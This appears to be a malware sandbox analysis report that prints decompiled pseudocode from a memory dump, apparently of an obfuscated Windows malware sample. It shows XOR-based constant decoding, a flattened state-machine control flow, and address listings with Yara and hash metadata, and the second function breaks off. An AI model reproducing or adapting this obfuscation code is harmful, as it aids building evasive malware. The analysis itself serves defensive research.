                          			E01230370(signed int* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int* _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t729;
				void* _t731;
				signed int _t734;
				signed int _t754;
				signed int _t757;
				signed int* _t760;
				void* _t818;
				signed int _t821;
				signed int _t832;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t856;
				signed int _t861;
				signed int* _t864;
				void* _t867;
				void* _t873;

				_t873 = __fp0;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_v204 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12 & 0x0000ffff);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0121358A(_a12 & 0x0000ffff);
				_v264 = 0x3bf2ba;
				_t864 =  &(( &_v264)[0xd]);
				_v264 = _v264 ^ 0xf9dcdfeb;
				_v264 = _v264 | 0xcf286d43;
				_t757 = 0;
				_v264 = _v264 + 0x2f6b;
				_t854 = 0xb0ddf6c;
				_v264 = _v264 ^ 0xffef9cbe;
				_v12 = 0x619986;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x86661813;
				_v64 = 0xacc813;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0002b3e8;
				_v56 = 0x16558c;
				_v56 = _v56 ^ 0x21def54d;
				_v56 = _v56 ^ 0x21c820c1;
				_v152 = 0x7852c;
				_v8 = 0;
				_t840 = 0x45;
				_v152 = _v152 / _t840;
				_v152 = _v152 / _t840;
				_v152 = _v152 ^ 0x00004067;
				_v168 = 0xfd93da;
				_v168 = _v168 + 0xffff8b1c;
				_v168 = _v168 << 0xb;
				_v168 = _v168 ^ 0xe8b7b000;
				_v224 = 0x659efc;
				_v224 = _v224 << 0xb;
				_v224 = _v224 ^ 0x7bc67180;
				_v224 = _v224 + 0xd5f9;
				_v224 = _v224 ^ 0x57366779;
				_v200 = 0xc43b1;
				_v200 = _v200 >> 7;
				_v200 = _v200 << 8;
				_v200 = _v200 >> 0xb;
				_v200 = _v200 ^ 0x04000310;
				_v232 = 0x288315;
				_v232 = _v232 << 0xd;
				_v232 = _v232 + 0x4c8e;
				_t841 = 0x5b;
				_v232 = _v232 / _t841;
				_v232 = _v232 ^ 0x0026191a;
				_v164 = 0x619644;
				_v164 = _v164 >> 1;
				_v164 = _v164 >> 9;
				_v164 = _v164 ^ 0x00001a65;
				_v32 = 0x9f01f9;
				_v32 = _v32 ^ 0xa48b040e;
				_v32 = _v32 ^ 0xa41404f7;
				_v176 = 0xac1aac;
				_t842 = 0x49;
				_v176 = _v176 / _t842;
				_v176 = _v176 + 0xffffa10e;
				_v176 = _v176 << 0xc;
				_v176 = _v176 ^ 0x9fc99000;
				_v40 = 0xb8c84b;
				_t843 = 0x73;
				_v40 = _v40 / _t843;
				_v40 = _v40 ^ 0x00019b57;
				_v244 = 0xf40d36;
				_t844 = 0x6b;
				_v244 = _v244 * 0x62;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 + 0xffffdda4;
				_v244 = _v244 ^ 0x00015319;
				_v228 = 0x789122;
				_v228 = _v228 + 0x7600;
				_v228 = _v228 ^ 0x06415a1a;
				_v228 = _v228 * 0x1a;
				_v228 = _v228 ^ 0xa1b977af;
				_v28 = 0xb5334d;
				_v28 = _v28 | 0x64adaea9;
				_v28 = _v28 ^ 0x64bdbff2;
				_v88 = 0x600bd7;
				_v88 = _v88 | 0x9bc31fbe;
				_v88 = _v88 ^ 0x9be31ffc;
				_v44 = 0xe4c8a4;
				_v44 = _v44 ^ 0x077e80f3;
				_v44 = _v44 ^ 0x079a4957;
				_v264 = 0x57efac;
				_v264 = _v264 >> 0xe;
				_v264 = _v264 * 0x53;
				_v264 = _v264 | 0x8853ee8b;
				_v264 = _v264 ^ 0x885ceb95;
				_v256 = 0xdaa3cd;
				_v256 = _v256 * 0x3c;
				_v256 = _v256 + 0xffffaf53;
				_v256 = _v256 ^ 0x333718c5;
				_v264 = 0x8cc3a4;
				_v264 = _v264 >> 0xd;
				_v264 = _v264 << 7;
				_v264 = _v264 >> 0xf;
				_v264 = _v264 ^ 0x00039b25;
				_v264 = 0x91c455;
				_v264 = _v264 << 8;
				_v264 = _v264 >> 0x10;
				_v264 = _v264 + 0xffffe696;
				_v264 = _v264 ^ 0x00055627;
				_v264 = 0xb8ce41;
				_v264 = _v264 / _t844;
				_v264 = _v264 | 0x92ffd4ff;
				_v264 = _v264 ^ 0x92f6d31d;
				_v264 = 0xfb8d54;
				_v264 = _v264 * 0x4c;
				_v264 = _v264 + 0xfffffc37;
				_v264 = _v264 << 0xd;
				_v264 = _v264 ^ 0xbe2f3023;
				_v260 = 0x8d0500;
				_v260 = _v260 + 0x8ef7;
				_v260 = _v260 ^ 0x008a8944;
				_v260 = 0x9b4ebc;
				_v260 = _v260 | 0x9f300090;
				_v260 = _v260 ^ 0x9fbf2fd3;
				_v260 = 0xb11a34;
				_v260 = _v260 + 0xffff397e;
				_v260 = _v260 ^ 0x00bda5bc;
				_v260 = 0xda4006;
				_v260 = _v260 + 0xffff2350;
				_v260 = _v260 ^ 0x00df924b;
				_v260 = 0xfa264;
				_v260 = _v260 | 0xe03386ab;
				_v260 = _v260 ^ 0xe03becb8;
				_v260 = 0x36c206;
				_t861 = 0x7e;
				_t845 = 0x4e;
				_v260 = _v260 * 0x53;
				_v260 = _v260 ^ 0x11c21e2e;
				_v264 = 0xeb8ad6;
				_v264 = _v264 + 0xffffff14;
				_v264 = _v264 | 0xa4e49e57;
				_v264 = _v264 * 0x31;
				_v264 = _v264 ^ 0x91df8148;
				_v260 = 0x49e4dc;
				_v260 = _v260 | 0x32361d08;
				_v260 = _v260 ^ 0x32798df6;
				_v148 = 0xdedd33;
				_v148 = _v148 + 0x20c1;
				_v148 = _v148 ^ 0xf511dd0a;
				_v148 = _v148 ^ 0xf5cc8216;
				_v172 = 0x4e325e;
				_v172 = _v172 + 0x69f5;
				_v172 = _v172 << 8;
				_v172 = _v172 / _t861;
				_v172 = _v172 ^ 0x0098c5bf;
				_v132 = 0x56f111;
				_v132 = _v132 / _t845;
				_v132 = _v132 + 0xffff6d40;
				_v132 = _v132 ^ 0x000c7fcf;
				_v108 = 0x564a26;
				_v108 = _v108 ^ 0x5ac3ed89;
				_v108 = _v108 ^ 0x5a9ae1e1;
				_v208 = 0x713a4f;
				_v208 = _v208 >> 9;
				_v208 = _v208 << 4;
				_v208 = _v208 + 0xffff8e7c;
				_v208 = _v208 ^ 0x0001aef6;
				_v72 = 0xa78a5a;
				_v72 = _v72 ^ 0x21ab4a2c;
				_v72 = _v72 ^ 0x210ed8c8;
				_v156 = 0x8eec2a;
				_t846 = 0x1d;
				_v156 = _v156 / _t846;
				_v156 = _v156 | 0xe8d7ca9f;
				_v156 = _v156 ^ 0xe8db3425;
				_v216 = 0xbe7af4;
				_v216 = _v216 + 0x62f0;
				_v216 = _v216 >> 0xa;
				_v216 = _v216 << 4;
				_v216 = _v216 ^ 0x000ca62c;
				_v112 = 0x5cddf;
				_v112 = _v112 + 0xffff7278;
				_v112 = _v112 << 5;
				_v112 = _v112 ^ 0x00ac458e;
				_v124 = 0xf4fe4a;
				_v124 = _v124 * 0x23;
				_v124 = _v124 + 0xffffa4ee;
				_v124 = _v124 ^ 0x217d925b;
				_v120 = 0x4295e2;
				_v120 = _v120 >> 0xc;
				_v120 = _v120 + 0xffffbc18;
				_v120 = _v120 ^ 0xfffbc35b;
				_v140 = 0x4e8e05;
				_t847 = 0x53;
				_v140 = _v140 * 7;
				_t848 = 0x2a;
				_v140 = _v140 / _t847;
				_v140 = _v140 ^ 0x000d3014;
				_v116 = 0x219afb;
				_v116 = _v116 ^ 0x1bb70309;
				_v116 = _v116 + 0x9cdb;
				_v116 = _v116 ^ 0x1b9e374a;
				_v240 = 0x7e790f;
				_v240 = _v240 >> 4;
				_v240 = _v240 | 0xdc4d67aa;
				_v240 = _v240 * 0x7d;
				_v240 = _v240 ^ 0x93030bed;
				_v144 = 0x893e76;
				_v144 = _v144 | 0x7cc55deb;
				_v144 = _v144 ^ 0x7cc15b6f;
				_v252 = 0x6ec0a5;
				_v252 = _v252 + 0xffff0e3e;
				_v252 = _v252 << 8;
				_v252 = _v252 + 0xad95;
				_v252 = _v252 ^ 0x6dc2e551;
				_v184 = 0xc9b8e5;
				_v184 = _v184 | 0x25333614;
				_v184 = _v184 + 0xffffa467;
				_v184 = _v184 + 0xffffd31f;
				_v184 = _v184 ^ 0x25f0dab7;
				_v100 = 0xa8adeb;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0x2b73a17b;
				_v104 = 0xbfbcb8;
				_v104 = _v104 << 6;
				_v104 = _v104 ^ 0x2fed78ee;
				_v76 = 0x79d50b;
				_v76 = _v76 + 0x9ff3;
				_v76 = _v76 ^ 0x007a052c;
				_v84 = 0x8f07c2;
				_t849 = 0xa;
				_v84 = _v84 / _t848;
				_v84 = _v84 ^ 0x00081a14;
				_v192 = 0x8fd6fb;
				_v192 = _v192 >> 0x10;
				_v192 = _v192 * 0x2d;
				_v192 = _v192 >> 0xb;
				_v192 = _v192 ^ 0x000533d4;
				_v92 = 0xf2e29d;
				_v92 = _v92 | 0xa8510241;
				_v92 = _v92 ^ 0xa8f24903;
				_v136 = 0x3fc77e;
				_t850 = 6;
				_v136 = _v136 / _t849;
				_v136 = _v136 + 0xf8ad;
				_v136 = _v136 ^ 0x000c94bb;
				_v248 = 0x1d2dee;
				_v248 = _v248 + 0xffffe467;
				_v248 = _v248 + 0xfffffb55;
				_v248 = _v248 << 7;
				_v248 = _v248 ^ 0x0e846fd7;
				_v68 = 0x7275c5;
				_v68 = _v68 / _t850;
				_v68 = _v68 ^ 0x00138ff1;
				_v52 = 0xbd953f;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x002d867c;
				_v236 = 0x6c390e;
				_v236 = _v236 | 0x8341dc77;
				_v236 = _v236 ^ 0x9f2553b7;
				_v236 = _v236 + 0xc284;
				_v236 = _v236 ^ 0x1c443a9e;
				_v60 = 0xe4b226;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x0000e4f8;
				_v128 = 0x8a2f41;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0xa906698d;
				_v128 = _v128 ^ 0xa90fd0dd;
				_v260 = 0xb373e3;
				_t851 = 0x65;
				_v260 = _v260 * 0x5f;
				_v260 = _v260 ^ 0x4290d33f;
				_v212 = 0xc00726;
				_v212 = _v212 << 6;
				_v212 = _v212 + 0x64e5;
				_v212 = _v212 | 0x0a7365f4;
				_v212 = _v212 ^ 0x3a7366b9;
				_v220 = 0x4514f3;
				_v220 = _v220 * 0x17;
				_v220 = _v220 + 0x1d0d;
				_v220 = _v220 << 4;
				_v220 = _v220 ^ 0x63443f4d;
				_v160 = 0x303aac;
				_v160 = _v160 ^ 0x719995e8;
				_v160 = _v160 + 0xf6a4;
				_v160 = _v160 ^ 0x71ae9bf2;
				_v48 = 0x662090;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0396166a;
				_v96 = 0xa68bea;
				_v96 = _v96 + 0xffff38d0;
				_v96 = _v96 ^ 0x00a728da;
				_v180 = 0xd187dd;
				_v180 = _v180 / _t851;
				_v180 = _v180 >> 0xf;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0x0000146e;
				_v16 = 0x8b1f34;
				_v16 = _v16 + 0xffff45ca;
				_v16 = _v16 ^ 0x008aa47f;
				_v188 = 0xe35e5d;
				_v188 = _v188 + 0xdaf8;
				_v188 = _v188 | 0x67ffa7ad;
				_v188 = _v188 ^ 0x67f62311;
				_v24 = 0x5198a7;
				_v24 = _v24 ^ 0xd802f8d6;
				_v24 = _v24 ^ 0xd85bf2b2;
				_v20 = 0xe5d36f;
				_t852 = 0x7c;
				_v20 = _v20 / _t852;
				_v20 = _v20 ^ 0x00092876;
				_v80 = 0x923b59;
				_v80 = _v80 + 0xffffec13;
				_v80 = _v80 ^ 0x009b959b;
				_v264 = 0x6b0706;
				_v264 = _v264 * 0x43;
				_v264 = _v264 / _t861;
				_v264 = _v264 ^ 0xb16e0b4f;
				_v264 = _v264 ^ 0xb15e7c25;
				_v256 = 0x8513f5;
				_v256 = _v256 | 0xdf3fff5a;
				_v256 = _v256 ^ 0xdfb067f3;
				_t862 = _v4;
				_t853 = _v4;
				while(1) {
					L1:
					while(1) {
						_t729 = _v196;
						while(1) {
							L3:
							_t867 = _t854 - 0xaef784f;
							if(_t867 > 0) {
								break;
							}
							if(_t867 == 0) {
								E01211934(_t757, _v188, _v24, _t853, _t854, _t873, _t853);
								L21:
								_t854 = 0x772bc2f;
								L13:
								_t760 = _v204;
								goto L1;
							}
							if(_t854 == 0x5ee6bd) {
								_push(_v120);
								_t729 = E01222621(_t862, _v156, _a12, _a40, _v216, _t760, _v88, _v112, _v124);
								_t760 = _v204;
								_t864 = _t864 - 0xc + 0x2c;
								__eflags = _t729;
								_v196 = _t729;
								_t818 = 0xc6135b8;
								_t854 =  !=  ? 0xc6135b8 : 0x809a129;
								continue;
							}
							if(_t854 == 0x44fc0cb) {
								_t854 = 0xcfaad0f;
								continue;
							}
							if(_t854 == 0x586e335) {
								_t734 =  *_t760;
								__eflags = _t734;
								if(_t734 == 0) {
									_t821 = 0;
									__eflags = 0;
								} else {
									_t821 = _t760[1];
								}
								E012130A2(_v160, _t821, _t760, _a32, _t734, _v48, _v96, _v180, _t853, _v16);
								_t864 =  &(_t864[8]);
								asm("sbb esi, esi");
								_t854 = (_t854 & 0x01d169f5) + 0xaef784f;
								goto L13;
							}
							if(_t854 == 0x772bc2f) {
								_t598 =  &_v20; // 0x92876
								E01211934(_t757,  *_t598, _v80, _t853, _t854, _t873, _t729);
								_t854 = 0x809a129;
								goto L13;
							}
							if(_t854 != 0x809a129) {
								L41:
								__eflags = _t854 - 0xeaf6d2a;
								if(_t854 == 0xeaf6d2a) {
									L11:
									return _t757;
								}
								_t729 = _v196;
								continue;
							}
							E01211934(_t757, _v264, _v256, _t853, _t854, _t873, _t862);
							goto L11;
						}
						__eflags = _t854 - 0xb000863;
						if(_t854 == 0xb000863) {
							__eflags = E01212CC2(_t853, _a24);
							_t854 = 0xaef784f;
							_t731 = 1;
							_t757 =  !=  ? _t731 : _t757;
							L40:
							_t760 = _v204;
							_t818 = 0xc6135b8;
							goto L41;
						}
						__eflags = _t854 - 0xb0ddf6c;
						if(_t854 == 0xb0ddf6c) {
							_t854 = 0x44fc0cb;
							goto L3;
						}
						__eflags = _t854 - _t818;
						if(_t854 == _t818) {
							__eflags =  *_t760;
							if(__eflags == 0) {
								_t739 = _v8;
							} else {
								_push(_v240);
								_push(_v116);
								_v8 = E0122CD35(0x1211188, _v140, __eflags);
							}
							_t832 = _v176 | _v32 | _v164 | _v232 | _v200 | _v224 | _v168 | _v152 | _v56;
							_t856 = _a16 & 1;
							__eflags = _t856;
							if(_t856 != 0) {
								__eflags = _t832;
							}
							_push(1);
							_push(_v104);
							_push(1);
							_push(_v100);
							_t853 = E01229FF7(_t739, _t832, _v196, _v144, 1, _v252, 1, _a28, _v184);
							_t654 =  &_v76; // 0x92876
							E0122629F( *_t654, _v8, _v84, _v192, _v92);
							_t864 =  &(_t864[0xe]);
							__eflags = _t853;
							if(_t853 == 0) {
								goto L21;
							} else {
								_v36 = 1;
								E012171F1(_v136, _t853, _v244, _v248,  &_v36, 4, _v68);
								_t864 =  &(_t864[5]);
								__eflags = _t856;
								if(_t856 != 0) {
									E0122DE84(_v228, _v52, _t853,  &_v4, _v236, _v60,  &_v36, _v128);
									_t670 =  &_v36;
									 *_t670 = _v36 | _v44;
									__eflags =  *_t670;
									E012171F1(_v260, _t853, _v28, _v212,  &_v36, _v4, _v220);
									_t864 =  &(_t864[0xb]);
								}
								_t854 = 0x586e335;
								goto L13;
							}
						}
						__eflags = _t854 - 0xcc0e244;
						if(__eflags == 0) {
							__eflags = E012226F9(_t853, _v12, __eflags) - _v64;
							_t854 =  ==  ? 0xb000863 : 0xaef784f;
							goto L13;
						}
						__eflags = _t854 - 0xcfaad0f;
						if(_t854 != 0xcfaad0f) {
							goto L41;
						}
						_t754 = E012170AE(_v148, _v172, _t760, _v40, _t760, _t760, _v132, _v108);
						_t862 = _t754;
						__eflags = _t754;
						_t854 =  !=  ? 0x5ee6bd : 0xeaf6d2a;
						E0121AE43(0, _v208, _v72);
						_t864 =  &(_t864[8]);
						goto L40;
					}
				}
			}





































































































                          0x01230370
                          0x0123037a
                          0x01230388
                          0x01230392
                          0x01230399
                          0x0123039d
                          0x012303a4
                          0x012303ab
                          0x012303b2
                          0x012303b9
                          0x012303c0
                          0x012303c1
                          0x012303c8
                          0x012303cf
                          0x012303d0
                          0x012303d1
                          0x012303d6
                          0x012303de
                          0x012303e1
                          0x012303eb
                          0x012303f3
                          0x012303f5
                          0x012303fd
                          0x01230402
                          0x0123040a
                          0x01230415
                          0x0123041d
                          0x01230428
                          0x01230433
                          0x0123043b
                          0x01230446
                          0x01230451
                          0x0123045c
                          0x01230467
                          0x0123047b
                          0x01230482
                          0x01230487
                          0x01230499
                          0x012304a2
                          0x012304ad
                          0x012304b5
                          0x012304bd
                          0x012304c2
                          0x012304ca
                          0x012304d2
                          0x012304d7
                          0x012304df
                          0x012304e7
                          0x012304ef
                          0x012304f7
                          0x012304fc
                          0x01230501
                          0x01230506
                          0x0123050e
                          0x01230516
                          0x0123051b
                          0x01230527
                          0x0123052a
                          0x0123052e
                          0x01230536
                          0x0123053e
                          0x01230542
                          0x01230547
                          0x0123054f
                          0x0123055a
                          0x01230565
                          0x01230572
                          0x01230580
                          0x01230585
                          0x0123058b
                          0x01230593
                          0x01230598
                          0x012305a0
                          0x012305b2
                          0x012305b7
                          0x012305c0
                          0x012305cb
                          0x012305d8
                          0x012305d9
                          0x012305dd
                          0x012305e2
                          0x012305ea
                          0x012305f2
                          0x012305fa
                          0x01230602
                          0x0123060f
                          0x01230613
                          0x0123061b
                          0x01230626
                          0x01230631
                          0x0123063c
                          0x01230647
                          0x01230652
                          0x0123065d
                          0x01230668
                          0x01230673
                          0x0123067e
                          0x01230686
                          0x01230690
                          0x01230694
                          0x0123069c
                          0x012306a4
                          0x012306b1
                          0x012306b5
                          0x012306bd
                          0x012306c5
                          0x012306cd
                          0x012306d2
                          0x012306d7
                          0x012306dc
                          0x012306e4
                          0x012306ec
                          0x012306f1
                          0x012306f6
                          0x012306fe
                          0x01230706
                          0x01230714
                          0x01230718
                          0x01230720
                          0x01230728
                          0x01230735
                          0x01230739
                          0x01230741
                          0x01230746
                          0x0123074e
                          0x01230756
                          0x0123075e
                          0x01230766
                          0x0123076e
                          0x01230776
                          0x01230780
                          0x01230788
                          0x01230790
                          0x01230798
                          0x012307a0
                          0x012307a8
                          0x012307b0
                          0x012307b8
                          0x012307c0
                          0x012307c8
                          0x012307d7
                          0x012307da
                          0x012307db
                          0x012307df
                          0x012307e7
                          0x012307ef
                          0x012307f7
                          0x01230806
                          0x0123080a
                          0x01230812
                          0x0123081a
                          0x01230822
                          0x0123082a
                          0x01230835
                          0x01230840
                          0x0123084b
                          0x01230856
                          0x0123085e
                          0x01230866
                          0x01230873
                          0x01230877
                          0x0123087f
                          0x01230895
                          0x0123089c
                          0x012308a7
                          0x012308b2
                          0x012308bd
                          0x012308c8
                          0x012308d3
                          0x012308db
                          0x012308e0
                          0x012308e5
                          0x012308ed
                          0x012308f5
                          0x01230900
                          0x0123090b
                          0x01230916
                          0x01230928
                          0x0123092b
                          0x0123092f
                          0x01230937
                          0x0123093f
                          0x01230947
                          0x0123094f
                          0x01230954
                          0x01230959
                          0x01230961
                          0x0123096c
                          0x01230977
                          0x0123097f
                          0x0123098a
                          0x0123099d
                          0x012309a4
                          0x012309af
                          0x012309ba
                          0x012309c5
                          0x012309cf
                          0x012309da
                          0x012309e5
                          0x012309fa
                          0x012309fd
                          0x01230a0d
                          0x01230a0e
                          0x01230a17
                          0x01230a22
                          0x01230a2d
                          0x01230a38
                          0x01230a43
                          0x01230a4e
                          0x01230a56
                          0x01230a5b
                          0x01230a6a
                          0x01230a6e
                          0x01230a76
                          0x01230a81
                          0x01230a8c
                          0x01230a97
                          0x01230a9f
                          0x01230aa7
                          0x01230aac
                          0x01230ab4
                          0x01230abc
                          0x01230ac4
                          0x01230acc
                          0x01230ad4
                          0x01230adc
                          0x01230ae4
                          0x01230aef
                          0x01230af7
                          0x01230b02
                          0x01230b0d
                          0x01230b15
                          0x01230b20
                          0x01230b2b
                          0x01230b36
                          0x01230b41
                          0x01230b55
                          0x01230b56
                          0x01230b5f
                          0x01230b6a
                          0x01230b72
                          0x01230b7e
                          0x01230b82
                          0x01230b87
                          0x01230b8f
                          0x01230b9a
                          0x01230ba5
                          0x01230bb0
                          0x01230bc4
                          0x01230bc5
                          0x01230bcc
                          0x01230bd7
                          0x01230be2
                          0x01230bea
                          0x01230bf2
                          0x01230bfa
                          0x01230bff
                          0x01230c09
                          0x01230c1f
                          0x01230c26
                          0x01230c31
                          0x01230c3c
                          0x01230c44
                          0x01230c4f
                          0x01230c57
                          0x01230c5f
                          0x01230c67
                          0x01230c6f
                          0x01230c77
                          0x01230c82
                          0x01230c8a
                          0x01230c95
                          0x01230ca0
                          0x01230ca8
                          0x01230cb3
                          0x01230cbe
                          0x01230ccd
                          0x01230cd0
                          0x01230cd4
                          0x01230cdc
                          0x01230ce4
                          0x01230ce9
                          0x01230cf1
                          0x01230cf9
                          0x01230d01
                          0x01230d0e
                          0x01230d12
                          0x01230d1a
                          0x01230d1f
                          0x01230d27
                          0x01230d2f
                          0x01230d37
                          0x01230d3f
                          0x01230d47
                          0x01230d5a
                          0x01230d61
                          0x01230d6c
                          0x01230d77
                          0x01230d82
                          0x01230d8d
                          0x01230d9d
                          0x01230da1
                          0x01230da6
                          0x01230dab
                          0x01230db3
                          0x01230dbe
                          0x01230dc9
                          0x01230dd4
                          0x01230ddc
                          0x01230de4
                          0x01230dec
                          0x01230df4
                          0x01230dff
                          0x01230e0a
                          0x01230e15
                          0x01230e27
                          0x01230e2c
                          0x01230e33
                          0x01230e3e
                          0x01230e49
                          0x01230e54
                          0x01230e5f
                          0x01230e6c
                          0x01230e76
                          0x01230e7a
                          0x01230e82
                          0x01230e8a
                          0x01230e92
                          0x01230e9a
                          0x01230ea2
                          0x01230ea9
                          0x01230eb0
                          0x01230eb0
                          0x01230eb5
                          0x01230eb5
                          0x01230eb9
                          0x01230eb9
                          0x01230eb9
                          0x01230ebf
                          0x00000000
                          0x00000000
                          0x01230ec5
                          0x01231004
                          0x0123100a
                          0x0123100a
                          0x01230f35
                          0x01230f35
                          0x00000000
                          0x01230f35
                          0x01230ed1
                          0x01230f99
                          0x01230fd4
                          0x01230fd9
                          0x01230fdd
                          0x01230fe0
                          0x01230fe2
                          0x01230feb
                          0x01230ff0
                          0x00000000
                          0x01230ff0
                          0x01230edd
                          0x01230f8f
                          0x00000000
                          0x01230f8f
                          0x01230ee9
                          0x01230f3e
                          0x01230f40
                          0x01230f42
                          0x01230f49
                          0x01230f49
                          0x01230f44
                          0x01230f44
                          0x01230f44
                          0x01230f75
                          0x01230f7a
                          0x01230f7f
                          0x01230f87
                          0x00000000
                          0x01230f87
                          0x01230ef1
                          0x01230f22
                          0x01230f2a
                          0x01230f30
                          0x00000000
                          0x01230f30
                          0x01230ef9
                          0x01231280
                          0x01231280
                          0x01231286
                          0x01230f11
                          0x01230f1a
                          0x01230f1a
                          0x01230eb5
                          0x00000000
                          0x01230eb5
                          0x01230f08
                          0x00000000
                          0x01230f0d
                          0x01231014
                          0x0123101a
                          0x0123126a
                          0x0123126c
                          0x01231273
                          0x01231274
                          0x01231277
                          0x01231277
                          0x0123127b
                          0x00000000
                          0x0123127b
                          0x01231020
                          0x01231026
                          0x01231252
                          0x00000000
                          0x01231252
                          0x0123102c
                          0x0123102e
                          0x012310c7
                          0x012310ca
                          0x012310f3
                          0x012310cc
                          0x012310cc
                          0x012310d5
                          0x012310ea
                          0x012310ea
                          0x0123112a
                          0x01231131
                          0x01231131
                          0x01231133
                          0x01231135
                          0x01231135
                          0x0123113b
                          0x0123113c
                          0x01231143
                          0x01231144
                          0x0123117c
                          0x0123118c
                          0x01231193
                          0x01231198
                          0x0123119b
                          0x0123119d
                          0x00000000
                          0x012311a3
                          0x012311af
                          0x012311cf
                          0x012311d4
                          0x012311d7
                          0x012311d9
                          0x01231209
                          0x0123121b
                          0x0123121b
                          0x0123121b
                          0x01231240
                          0x01231245
                          0x01231245
                          0x01231248
                          0x00000000
                          0x01231248
                          0x0123119d
                          0x01231034
                          0x0123103a
                          0x012310b8
                          0x012310bf
                          0x00000000
                          0x012310bf
                          0x0123103c
                          0x01231042
                          0x00000000
                          0x00000000
                          0x0123106e
                          0x0123107e
                          0x01231080
                          0x0123108c
                          0x01231091
                          0x01231096
                          0x00000000
                          0x01231096
                          0x01230eb5

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &JV$M?Dc$M?Dcyg6W$O:q$Ox$Ox$Ox$]^$^2N$g@$k/$v($yg6W$d$x/
                          • API String ID: 0-229219556
                          • Opcode ID: 643afd3e301650ac30345b5a779e20a4a9e67444128b651d24b176ce818ae516
                          • Instruction ID: d7b81e3efd77c940be4f33c7eb19d8db0e66e49a7462cb6861c062701cc33f3c
                          • Opcode Fuzzy Hash: 643afd3e301650ac30345b5a779e20a4a9e67444128b651d24b176ce818ae516
                          • Instruction Fuzzy Hash: 91721FB15093818FD3B8CF25C54AA9FBBE1BBD4704F108A1DE6DA96220D7B48949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122590E, Relevance: 16.7, Strings: 13, Instructions: 421COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E0122590E() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				void* _t486;
				void* _t491;
				intOrPtr* _t502;
				signed int _t507;
				intOrPtr* _t509;
				void* _t523;
				void* _t571;
				signed int* _t576;

				_t576 =  &_v1772;
				_v1576 = 0x6c0937;
				_v1568 = 0;
				_v1564 = 0;
				_v1572 = 0xfa7be3;
				_v1684 = 0xa1225e;
				_v1684 = _v1684 * 0x51;
				_t571 = 0xcaba985;
				_v1684 = _v1684 ^ 0xec4ee212;
				_v1684 = _v1684 ^ 0xdeb53d85;
				_v1720 = 0xe8c45a;
				_v1720 = _v1720 | 0xf7adb3a9;
				_v1720 = _v1720 + 0x22cb;
				_v1720 = _v1720 ^ 0x77ee1ac7;
				_v1628 = 0x3e0abb;
				_v1628 = _v1628 | 0xadd487ce;
				_v1628 = _v1628 ^ 0xadfe8ffd;
				_v1724 = 0xa9a1a9;
				_v1724 = _v1724 + 0x3c79;
				_v1724 = _v1724 << 4;
				_v1724 = _v1724 ^ 0xfba865cd;
				_v1724 = _v1724 ^ 0xf13587ec;
				_v1640 = 0xd94aa8;
				_push(0x54);
